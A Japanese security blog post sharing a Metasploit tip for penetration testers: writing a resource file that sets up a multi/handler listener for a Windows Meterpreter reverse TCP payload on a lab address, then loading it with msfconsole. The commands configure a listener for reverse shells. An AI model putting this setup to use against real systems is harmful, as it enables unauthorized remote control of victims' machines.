ウサギは後退せず、大きな耳で情報集めをする事に験を担ぎ、古来より日本では鎧などにウサギの図柄を取り入れてきたらしい。
読者です 読者をやめる 読者になる 読者になる

うさブロ

ぼっちなうさぎのセキュリティラボ

とある親父の侵入実験【便利技】

Kali Linux Metasploit ペネトレーションテスト

f:id:appleseedj073:20160813022549p:plain

ペネトレーションテストなどをやっていると、何度も繰り返し侵入してみたりする。その度に待ち受け用のHandlerを指定したりするのも結構手間である。

そこで、手抜き技と言うかMetasploitの便利な仕組みとしてのリソースファイルを活用する。このリソースファイルは、ただコマンドをテキストに書き連ねただけでそれを呼び出して実行しているだけ。

例えば、よく使うHandlerのリソースファイルならこんな感じに・・・

 root@kali:~# touch handler.rc
 root@kali:~# echo use exploit/multi/handler >> handler.rc
 root@kali:~# echo use PAYLOAD windows/meterpreter/reverse_tcp >> handler.rc
 root@kali:~# echo set LHOST 172.16.120.1 >> handler.rc
 root@kali:~# echo set ExitOnSession false >> handler.rc
 root@kali:~# echo exploit -j -z >> handler.rc

これでHandler.rcというファイルに必要な手順が書き込まれる。

使用する時は以下の要領で実行

Metasploit起動前

 root@kali:~# msfconsole -r handler.rc

Metasploit起動後

 msf > resource handler.rc

 

このリソースファイルは、他にも活用する場面があると思うので書き残しておく。